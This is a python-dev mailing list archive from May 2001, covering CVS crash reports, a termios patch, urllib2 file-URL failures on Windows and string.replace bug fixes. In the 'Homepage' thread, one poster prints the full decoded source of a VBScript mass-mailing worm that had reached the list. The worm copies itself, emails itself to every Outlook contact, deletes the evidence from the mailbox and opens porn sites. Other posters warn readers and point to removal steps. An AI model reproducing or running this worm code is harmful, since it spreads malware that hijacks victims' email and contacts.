In-Reply-To: Message by <skip@pobox.com> ,
	     Tue, 8 May 2001 13:22:17 -0500 , <15096.14681.773554.729550@beluga.mojam.com> 
Message-ID: <20010509081630.84D8D303181@snelboot.oratrix.nl>

> 
>     Jack> It's actually 830 files. ... 120 .c/.h files ...
> 
> How many of those 120 files are variants of existing source files that (in
> theory) could be merged with their mainline counterparts?

None (unless you would count macmodule.c as a variant of posixmodule.c). I 
think macmain.c started out as a clone of pythonmain.c, but I think they're 
too different to merge (but I'll have a look).

Hmm, now that I think of it macmodule and posixmodule could possibly be 
merged.

It's fun to see how much statistics I gather about MacPython in just a few 
days:-)
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From tim.one at home.com  Wed May  9 10:20:12 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 04:20:12 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199
In-Reply-To: <20010508070501.A25794@glacier.fnational.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKBAA.tim.one@home.com>

[Neil Schemenauer]
> Shouldn't the entry in the __future__ file be:
>
>   nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))
>
> or am I misunderstanding something?

Until nested_scopes *is* the rule, the Mandatory Release field is just a
guess about the future.  Changing it to (2, 2, 0, "alpha", 0) right *now*
would be wrong, since it would change it from a guess about the future to a
false statement about the present.  It must be changed when nested_scopes
become mandatory; it needn't be changed before then (unless we delay making
them mandatory beyond 2.2 final), although if somebody thinks they have a
good use for moving the guess up, fine, just so long as they don't move the
guess to or before 2.2a0.


From thomas at xs4all.net  Wed May  9 10:58:50 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 10:58:50 +0200
Subject: [Python-Dev] Crashes w/ CVS tree
Message-ID: <20010509105850.F16486@xs4all.nl>

I'm getting a crash with Python compiled from a freshly updated CVS tree,
even when running just './python'. It crashes during the loading of os.pyc.
It doesn't crash if I start python with -S, and it doesn't crash if I remove
*.pyc first:

centurion:~/python/python-2.2/dist/src/linux> ./python 
Python 2.2a0 (#4, May  9 2001, 09:52:29) 
[GCC 2.95.4 20010506 (Debian prerelease)] on linux2
Type "copyright", "credits" or "license" for more information.
>>> 
centurion:~/python/python-2.2/dist/src/linux> ./python
Segmentation fault

If I remove os.pyc only, I get the enlightning:

Fatal Python error: PyString_InternInPlace: strings only please!
Abort (core dumped)

I would blame Tim <wink>, except that when examining the corefile I found
some pointers to other causes. The 'original' crash occurs because
cmp_outcome() is passed an invalid PyObject, with most of its function slots
pointing to the middle of the glibc-internal '__morecore()' function.
Examining the stack off of which the invalid item was popped reveals that
the next-to-last item is an iterator. So maybe I should blame Guido instead,
either for the iterator or for rich comparisons ;)


From thomas at xs4all.net  Wed May  9 11:14:32 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Wed, 9 May 2001 11:14:32 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects stringobject.c,2.111,2.112
In-Reply-To: <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>; from tim_one@users.sourceforge.net on Wed, May 09, 2001 at 01:43:23AM -0700
References: <20010509105850.F16486@xs4all.nl> <E14xPZ5-0002g4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <20010509111432.G16486@xs4all.nl>

On Wed, May 09, 2001 at 01:43:23AM -0700, Tim Peters wrote:
> Update of /cvsroot/python/python/dist/src/Objects
> In directory usw-pr-cvs1:/tmp/cvs-serv10106/python/dist/src/Objects
> 
> Modified Files:
> 	stringobject.c 
> Log Message:
> Sheesh -- repair the dodge around "cast isn't an lvalue" complaints to
> restore correct semantics.

This apparently fixed my problem:

On Wed, May 09, 2001 at 10:58:50AM +0200, Thomas Wouters wrote:
> 
> I'm getting a crash with Python compiled from a freshly updated CVS tree,
> even when running just './python'. It crashes during the loading of os.pyc.
> It doesn't crash if I start python with -S, and it doesn't crash if I remove
> *.pyc first:

That ought to teach me to spend my morning doing something fun -- it turned
out to be useless :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From tim.one at home.com  Wed May  9 11:29:31 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 05:29:31 -0400
Subject: [Python-Dev] Crashes w/ CVS tree
In-Reply-To: <20010509105850.F16486@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEALKBAA.tim.one@home.com>

[Thomas Wouters]
> I'm getting a crash with Python compiled from a freshly updated CVS
> tree,even when running just './python'.

I did too, for a little while, but it's gone away.

> ...
> Fatal Python error: PyString_InternInPlace: strings only please!
> Abort (core dumped)
>
> I would blame Tim <wink>,

I would too.  Please update, and if stringobject.c changes, try again.

I'm sure this is my fault, but I'm too sleepy to figure out why, and I did
change *something* at random that appeared to make it go away <wink>.

it's-all-gcc's-fault-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 17:49:29 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 11:49:29 -0400 
Subject: [Python-Dev] Homepage
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>


Hi!

You've got to see this page! It's really cool ;O)


-------------- next part --------------
A non-text attachment was scrubbed...
Name: homepage.HTML.vbs
Type: application/octet-stream
Size: 2419 bytes
Desc: not available
URL: <http://mail.python.org/pipermail/python-dev/attachments/20010509/144ed4b6/attachment.obj>

From guido at digicool.com  Wed May  9 19:08:22 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 12:08:22 -0500
Subject: [Python-Dev] Homepage
In-Reply-To: Your message of "Wed, 09 May 2001 11:49:29 -0400."
             <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> 
Message-ID: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>

Greg Wilson's computer was infected by a virus which got propagated to
python-dev.  Do NOT open the attachment!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fredrik at pythonware.com  Wed May  9 18:12:00 2001
From: fredrik at pythonware.com (Fredrik Lundh)
Date: Wed, 9 May 2001 18:12:00 +0200
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
Message-ID: <00fa01c0d8a2$c8d72b60$e46940d5@hagrid>

Greg's mail program wrote:

> Hi!
>
> You've got to see this page! It's really cool ;O)

> Content-Type: application/octet-stream;
>  name="homepage.HTML.vbs"
> Content-Transfer-Encoding: quoted-printable
> Content-Disposition: attachment;
>  filename="homepage.HTML.vbs"

when will we see the first "homepage.HTML.py" virus?

Cheers /F


From esr at thyrsus.com  Wed May  9 18:20:24 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Wed, 9 May 2001 12:20:24 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>; from guido@digicool.com on Wed, May 09, 2001 at 12:08:22PM -0500
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com> <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <20010509122024.A416@thyrsus.com>

Guido van Rossum <guido at digicool.com>:
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Some of us -- heh, heh -- aren't vulnerable to attachment trojans.
I could almost (not quite, but almost) love the crackers and script
kiddiez of the world for what they're doing to Microsoft...
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

We shall not cease from exploration, and the end of all our exploring will be
to arrive where we started and know the place for the first time.
	-- T.S. Eliot


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:21:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:21:27 -0400 (EDT)
Subject: [Python-Dev] [maintenance doc updates]
Message-ID: <20010509162127.52B6228946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/maint-docs/

Incremental update of the maintenance branch (for Python 2.1.1).


From barry at digicool.com  Wed May  9 18:23:26 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Wed, 9 May 2001 12:23:26 -0400
Subject: [Python-Dev] Homepage
References: <930BBCA4CEBBD411BE6500508BB3328F27B523@nsamcanms1.ca.baltimore.com>
	<200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <15097.28414.354061.170478@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Greg Wilson's computer was infected by a virus which got
    GvR> propagated to python-dev.  Do NOT open the attachment!

Darn, and I was just finishing up the vbs.el script so my XEmacs/VM
reader could open it.

share-the-pain-share-the-fun-ly y'rs,
-Barry


From fdrake at cj42289-a.reston1.va.home.com  Wed May  9 18:47:27 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Wed,  9 May 2001 12:47:27 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010509164727.1594428946@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental update of the development branch (for Python 2.2).


From pedroni at inf.ethz.ch  Wed May  9 19:12:20 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Wed, 9 May 2001 19:12:20 +0200 (MET DST)
Subject: [Python-Dev] Homepage
Message-ID: <200105091712.TAA05172@core.inf.ethz.ch>

Hi.

[GvR]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Here's the beast ("decrypted" and in a cage):
 ("decrypted" and in a cage):
(we got it also on the old jpython-interest)

MS has really increased computer usability, when I was younger
(and I'm not that old) one bad guy had to use assembler to cause
some damage, now thanks to MS, that don't cares much about security
but likely a lot about self-confindence, everybody can feel very clever
and proud writing such things ... and spamming the whole internet.

<danger>
On Error Resume Next
Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)

Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop

Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vb$",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing

If WS.regread ("HKCU\software\An\mailed") <> "1" then
Mailit()
End If

Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next

Randomize
r=Int((4*Rnd)+1)
If r=1 then
WS.Run("http://hardcore.pornbillboard.net/shannon/1.htm")
elseif r=2 Then
WS.Run("http://members.nbci.com/_XMCM/prinzje/1.htm")
elseif r=3 Then
WS.Run("http://www2.sexcropolis.com/amateur/sheila/1.htm")
ElseIf r=4 Then
WS.Run("http://sheila.issexy.tv/1.htm")
End If

Function Mailit()
On Error Resume Next
Set Outlook = CreateObject("Outlook.Application")
If Outlook = "Outlook" Then
	Set Mapi=Outlook.GetNameSpace("MAPI")
	Set Lists=Mapi.AddressLists
	For Each ListIndex In Lists
		If ListIndex.AddressEntries.Count <> 0 Then
			ContactCount = ListIndex.AddressEntries.Count
			For Count= 1 To ContactCount
				Set Mail = Outlook.CreateItem(0)
				Set Contact = ListIndex.AddressEntries(Count)
				Mail.To = Contact.Address
				Mail.Subject = "Homepage"
				Mail.Body = vbcrlf&"Hi!"&vbcrlf&vbcrlf&"You've 
got to see this page! It's really cool ;O)"&vbcrlf&vbcrlf
				Set Attachment=Mail.Attachments
				Attachment.Add Folder & "\homepage.HTML.vb$"
				Mail.DeleteAfterSubmit = True
				If Mail.To <> "" Then
				Mail.Send
				WS.regwrite "HKCU\software\An\mailed", "1"
			End If
			Next
		End If
	Next
End if
End Function
</danger>

PS: the "decryption" was done in python ;)


From tim.one at home.com  Wed May  9 19:47:22 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 13:47:22 -0400
Subject: [Python-Dev] Homepage
In-Reply-To: <200105091708.MAA30552@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKECFKBAA.tim.one@home.com>

[Guido]
> Greg Wilson's computer was infected by a virus which got propagated to
> python-dev.  Do NOT open the attachment!

Note that the same virus went out under the name of John G. Michopoulos on
the JPython (not Jython!) mailing list.

Here's detailed info on the virus (incl. simple removal instructions if you
got bit):

http://www.symantec.com/avcenter/venc/data/vbs.vbswg2.d at mm.html

Doesn't appear to be worse than a nuisance.  Anyone who has used Windows
Update within the last year <wink/sigh> and installed the "critical updates"
it recommends should have gotten a popup box warning that the attachment was
trying to access the Address Book, telling you it's probably a virus, and
advising to accept the "No, don't allow this" default.

you-can-make-it-foolproof-but-not-damnedfool-proof-ly y'rs  - tim


From Greg.Wilson at baltimore.com  Wed May  9 20:50:25 2001
From: Greg.Wilson at baltimore.com (Greg Wilson)
Date: Wed, 9 May 2001 14:50:25 -0400 
Subject: [Python-Dev] apology
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B690@nsamcanms1.ca.baltimore.com>

My apologies to all --- yes, my machine was hit by a virus
that flooded the known universe with email.

Sorry for any grief it has caused anyone,
Greg


From tim.one at home.com  Wed May  9 21:30:41 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 15:30:41 -0400
Subject: [Python-Dev] test_urllib2 fails on Win98SE
Message-ID: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>

test_urliib2 takes > 30 seconds, then fails:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 923, in open_local_file
    if not host or \
socket.error: host not found

The URL it's passing is

file://c:\code\python\dist\src\lib\urllib2.pyc

If I change test_urllib2's

    file_url = "file://%s" % urllib2.__file__

to (adding another slash)

    file_url = "file:///%s" % urllib2.__file__

then it fails like this instead, but very quickly:

C:\Code\python\dist\src\PCbuild>python ../lib/test/test_urllib2.py
Traceback (most recent call last):
  File "../lib/test/test_urllib2.py", line 15, in ?
    f = urllib2.urlopen(file_url)
  File "c:\code\python\dist\src\lib\urllib2.py", line 135, in urlopen
    return _opener.open(url, data)
  File "c:\code\python\dist\src\lib\urllib2.py", line 319, in open
    '_open', req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 298, in _call_chain
    result = func(*args)
  File "c:\code\python\dist\src\lib\urllib2.py", line 904, in file_open
    return self.open_local_file(req)
  File "c:\code\python\dist\src\lib\urllib2.py", line 925, in open_local_file
    return addinfourl(open(url2pathname(file), 'rb'),
IOError: [Errno 2] No such file or directory:
     '\\c:\\code\\python\\dist\\src\\lib\\urllib2.pyc'

Here's what I know about URLs: .

Here's what I know about file URLs: .

Here's what I know about file URLs on Windows: .

If I type the original

    file://c:\code\python\dist\src\lib\urllib2.pyc

into IE's address bar, it actually *executes* urllib2.


From mwh at python.net  Wed May  9 21:50:34 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 20:50:34 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: "Fred L. Drake"'s message of "Mon, 07 May 2001 10:55:37 -0700"
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake" <fdrake at users.sourceforge.net> writes:

> ! 	fd = PyObject_AsFileDescriptor(obj);
> ! 	if (fd == -1) {
> ! 		if (PyInt_Check(obj)) {
                    ^^^^^^^^^^^^^^^^
this is a bit pointless.

I admit

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
TypeError: tcgetattr, arg 1: can't extract file descriptor from "int"

is a bit confusing, but I'm not sure 

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
error: (9, 'Bad file descriptor')

is any better than:

->> termios.tcgetattr(-2)
Traceback (most recent call last):
  File "<input>", line 1, in ?
ValueError: file descriptor cannot be a negative integer (-2)

which is what you get after applying this patch:

Index: Modules/termios.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Modules/termios.c,v
retrieving revision 2.26
diff -c -r2.26 termios.c
*** Modules/termios.c   2001/05/09 17:53:06     2.26
--- Modules/termios.c   2001/05/09 19:49:52
***************
*** 37,43 ****
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       fd = PyInt_AS_LONG(obj);
                }
                else {
                        char* tname;
--- 37,43 ----
        fd = PyObject_AsFileDescriptor(obj);
        if (fd == -1) {
                if (PyInt_Check(obj)) {
!                       return 0;
                }
                else {
                        char* tname;

Cheers,
M.


From fdrake at acm.org  Wed May  9 22:09:09 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Wed, 9 May 2001 16:09:09 -0400 (EDT)
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
In-Reply-To: <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net>
	<m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>

Michael Hudson writes:
 > this is a bit pointless.

  You're right!  (Hey, it was your patch. ;)
  I'm checking in a different patch -- essentially,
PyObject_AsFileDescriptor() does the right thing, and we don't ever
need to second guess it.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May  9 22:13:46 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:13:46 +0100
Subject: [Python-Dev] "data".decode(encoding) ?!
In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 02 May 2001 21:55:25 +0200"
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com>
Message-ID: <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> I've attached the patch. Due to a small reorganisation the patch is
> a little longer -- symmetry has its price at C level too ;-)

I may be being dense, but can you explain what's going on here:

->> u'\u00e3'.encode('latin-1')
'\xe3'
->> u'\u00e3'.encode("latin-1").decode("latin-1")
Traceback (most recent call last):
  File "<input>", line 1, in ?
UnicodeError: ASCII encoding error: ordinal not in range(128)

Can you come up with some other example I can use it tomorrow's
python-dev summary?

Cheers,
M.

-- 
  Remember - if all you have is an axe, every problem looks 
  like hours of fun.                                        -- Frossie
               -- http://home.xnet.com/~raven/Sysadmin/ASR.Quotes.html


From mwh at python.net  Wed May  9 22:18:47 2001
From: mwh at python.net (Michael Hudson)
Date: 09 May 2001 21:18:47 +0100
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules termios.c,2.24,2.25
References: <E14wpEP-0000fi-00@usw-pr-cvs1.sourceforge.net> <m3bsp2s3n9.fsf@atrus.jesus.cam.ac.uk> <15097.41957.820142.77750@cj42289-a.reston1.va.home.com>
Message-ID: <m33daes2c8.fsf@atrus.jesus.cam.ac.uk>

"Fred L. Drake, Jr." <fdrake at acm.org> writes:

> Michael Hudson writes:
>  > this is a bit pointless.
> 
>   You're right!  (Hey, it was your patch. ;)

So it was!  I must have uploaded a slightly stale version of the
patch, because I noticed this when cvs update conflicted with what I
had in Modules/termios.c... oops.

>   I'm checking in a different patch -- essentially,
> PyObject_AsFileDescriptor() does the right thing, and we don't ever
> need to second guess it.

I was a bit concerned that the error should contain the function name.
On reflection, I agree that the code is so much simpler that it's a
win.

Cheers,
M.

-- 
  Java sucks. [...] Java on TV set top boxes will suck so hard it
  might well inhale people from off  their sofa until their heads
  get wedged in the card slots.              --- Jon Rabone, ucam.chat


From paulp at ActiveState.com  Wed May  9 22:48:38 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Wed, 09 May 2001 13:48:38 -0700
Subject: [Python-Dev] test_urllib2 fails on Win98SE
References: <LNBBLJKPBEHFEDALKOLCAECIKBAA.tim.one@home.com>
Message-ID: <3AF9AD26.AC6DD323@ActiveState.com>

Tim Peters wrote:
> 
>...
> 
> Here's what I know about file URLs on Windows: .

We constantly run into these problems with Komodo. The long and short is
that file URL handling on Windows is totally different than on Unix and
platform-specific code is probably appropriate.

Here's what I know: IE treats the following equivalently:

c:\temp\diff.txt
file:c:\temp\diff.txt
file:/c:\temp\diff.txt
file://c:\temp\diff.txt
file:///c:\temp\diff.txt
file:///////////////////////////////c:\temp\diff.txt

You can also reverse backslashes to slashes and slashes to backslashes
if you like. Interestingly, though, UNC paths seem to work okay (no
matter how you do the slashes and backslashes):

file://americano\home\paulp\foo.html

UNC paths seem to only allow two leading slashes/backslashes.

Truly this is a new level of "be liberal in what you accept". The
algorithm is probably something like:

 1. normalize to forward slashes. 
 2. Remove "file:". 
 3. What you have left should be of the form:

//machine/path

or 

(/*)x:/path

Where x is the drive letter.

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From fredrik at effbot.org  Thu May 10 01:19:40 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 10 May 2001 01:19:40 +0200
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
References: <E14xcwW-0004E4-00@usw-pr-cvs1.sourceforge.net>
Message-ID: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>

tim wrote:

> Modified Files:
> stropmodule.c 
> Log Message:
> SF bug #422088: [OSF1 alpha] string.replace().
> Platform blew up on "123".replace("123", "").  Michael Hudson pinned the
> blame on platform malloc(0) returning NULL.

any reason why the

#ifdef MALLOC_ZERO_RETURNS_NULL

macro (in pyport.h) isn't set / doesn't take care of this?

(and is it just me, or does the strop.replace function allocate
a buffer, copy the result to that buffer, only to copy it into a
string and throw the buffer away?  no wonder u"".replace() is
30% faster than "".replace() ;-)

Cheers /F


From tim at digicool.com  Thu May 10 01:39:08 2001
From: tim at digicool.com (Tim Peters)
Date: Wed, 9 May 2001 19:39:08 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <05e001c0d8de$87fcb9c0$e46940d5@hagrid>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>

[Fredrik Lundh]
> any reason why the
>
> #ifdef MALLOC_ZERO_RETURNS_NULL
>
> macro (in pyport.h) isn't set / doesn't take care of this?

The code uses PyMem_MALLOC, which after a chain of umpteen #defines ends up
being plain malloc.  As Michael noted in the bug report, it could have used
PyMem_Malloc() instead and avoided the problem.  But I chose not to do that,
since special-casing a result of 0 was more efficient for reasons other than
malloc.  However:

> (and is it just me, or does the strop.replace function allocate
> a buffer, copy the result to that buffer, only to copy it into a
> string and throw the buffer away?

Yes.  And I'm returning something now that musn't be free()'ed when the
result length is 0.  Will fix.

> no wonder u"".replace() is 30% faster than "".replace() ;-)

For a given number of characters or bytes <wink>?


From tim.one at home.com  Thu May 10 01:46:13 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 19:46:13 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEDHKBAA.tim@digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com>

Oh, fuck.  Somebody remind me why we have both stropmodule.c and
stringobject.c?  These bugs exist in both.


From mike.mellor at tbe.com  Thu May 10 02:16:28 2001
From: mike.mellor at tbe.com (mike.mellor at tbe.com)
Date: Thu, 10 May 2001 00:16:28 -0000
Subject: [Python-Dev] CygWin and Tkinter
Message-ID: <9dcmks+6aqf@eGroups.com>

I am playing around with CygWin (which came with Pyhton 2.1 
installed).  While I can run command line programs, Tkinter is not 
part of the package.  TCL/TK is installed and I have been able to 
build TK GUI's.  How can I get Tkinter added to my Python package?  
Thanks.

Mike


From tim.one at home.com  Thu May 10 02:47:52 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 20:47:52 -0400
Subject: [Python-Dev] Inconsistent string.replace() behavior
Message-ID: <LNBBLJKPBEHFEDALKOLCGEDLKBAA.tim.one@home.com>

test_strop.py contains this line:

    test('replace', 'one!two!three!', 'one at two@three@', '!', '@', 0)

string_tests.py has this:

    test('replace', 'one!two!three!', 'one!two!three!', '!', '@', 0)

IOW, the test suite insists that

    strop.replace('one!two!three!', '!', '@', 0)

replace all matches but that

    string.replace('one!two!three!', '!', '@', 0)
and
    'one!two!three!'.replace('!', '@', 0)

replace nothing.

I've been thrashing like a madman trying to fix a common bug in both modules
(in out-of-synch copies of mymemreplace), and every time I think I fix
something "the other" module breaks.  The above appears to be why.

My opinion:  the test_strop.py test is in error, and so was strop_replace()
in stropmodule.c.  I'm checking in changes accordingly, but won't mind
getting yelled at if you disagree.


From greg at cosc.canterbury.ac.nz  Thu May 10 02:56:12 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 10 May 2001 12:56:12 +1200 (NZST)
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEADKBAA.tim.one@home.com>
Message-ID: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>

Tim Peters <tim.one at home.com>:

>		PyObject *t = (PyObject *)op;
>    		PyString_InternInPlace(&t);

If you want to keep it all on one line, you could try

	PyString_InternInPlace((PyObject **)&op);

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From guido at digicool.com  Thu May 10 04:00:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:00:36 -0500
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
In-Reply-To: Your message of "Wed, 09 May 2001 19:46:13 -0400."
             <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCCEDIKBAA.tim.one@home.com> 
Message-ID: <200105100200.VAA00411@cj20424-a.reston1.va.home.com>

> Oh, fuck.  Somebody remind me why we have both stropmodule.c and
> stringobject.c?  These bugs exist in both.

In my mind, strop is obsolete.  We keep it around because some losers
like to import it directly, but it's basically dead, and except for a
few functions, string.py doesn't use it any more.  (The exceptions are
maketrans, lowercase, uppercase, whitespace.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 10 04:01:20 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 09 May 2001 21:01:20 -0500
Subject: [Python-Dev] CygWin and Tkinter
In-Reply-To: Your message of "Thu, 10 May 2001 00:16:28 GMT."
             <9dcmks+6aqf@eGroups.com> 
References: <9dcmks+6aqf@eGroups.com> 
Message-ID: <200105100201.VAA00435@cj20424-a.reston1.va.home.com>

> I am playing around with CygWin (which came with Pyhton 2.1 
> installed).  While I can run command line programs, Tkinter is not 
> part of the package.  TCL/TK is installed and I have been able to 
> build TK GUI's.  How can I get Tkinter added to my Python package?  
> Thanks.

Beats me.  Ask whoever produces the CygWin port.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Thu May 10 03:07:40 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 9 May 2001 21:07:40 -0400
Subject: [Python-Dev] gcc barfs on recent stringobject changes...
In-Reply-To: <200105100056.MAA17516@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEDNKBAA.tim.one@home.com>

>>		PyObject *t = (PyObject *)op;
>>   		PyString_InternInPlace(&t);

[Greg Ewing]
> If you want to keep it all on one line, you could try
>
> 	PyString_InternInPlace((PyObject **)&op);

op is declared "register" so it's not strictly legal to apply the address-of
operator to it regardless.  Besides, Guido pays me by the line <wink>.

or-maybe-by-the-useless-checkin-to-judge-from-the-last-24-hours-ly
    y'rs  - tim


From gward at python.net  Thu May 10 03:08:58 2001
From: gward at python.net (Greg Ward)
Date: Wed, 9 May 2001 21:08:58 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77
